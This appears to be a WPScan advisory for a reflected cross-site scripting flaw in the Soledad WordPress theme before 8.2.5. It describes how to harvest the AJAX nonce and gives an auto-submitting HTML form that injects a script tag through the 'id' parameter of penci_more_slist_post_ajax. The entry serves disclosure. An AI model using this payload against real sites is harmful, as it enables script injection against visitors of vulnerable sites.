Themes Vulnerabilities
Soledad < 8.2.5 - Reflected Cross-site Scripting
Description
The theme does not sanitise the {id,datafilter[type],...} parameters in its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
Proof of Concept
A threat actor can collect the nonce value on the main webpage by searching for it on the ajax_var_more call:
var ajax_var_more = {"url":"https:\/\/soledaddemo.pencidesign.net\/wp-admin\/admin-ajax.php","nonce":"d6c491629c","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","login":"Email Address","password":"Password","headerstyle":"default"};
And then can create a webpage redirecting the user to a compromised version of the site such as:
```
<html>
<body onload="myform.submit()">
<form action="https://soledaddemo.pencidesign.net/wp-admin/admin-ajax.php" method="POST" name="myform">
<input type="hidden" name="action" value="penci_more_slist_post_ajax" />
<input type="hidden" name="id" value=""><script>alert`XSS-Checker`</script>" />
<input type="hidden" name="nonce" value="d6c491629c" />
</form>
</body>
</html>
```
Affects Themes
Fixed in 8.2.5 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-13 (about 1 years ago)
Added
2022-09-13 (about 1 years ago)
Last Updated
2022-09-13 (about 1 years ago)
WPScan 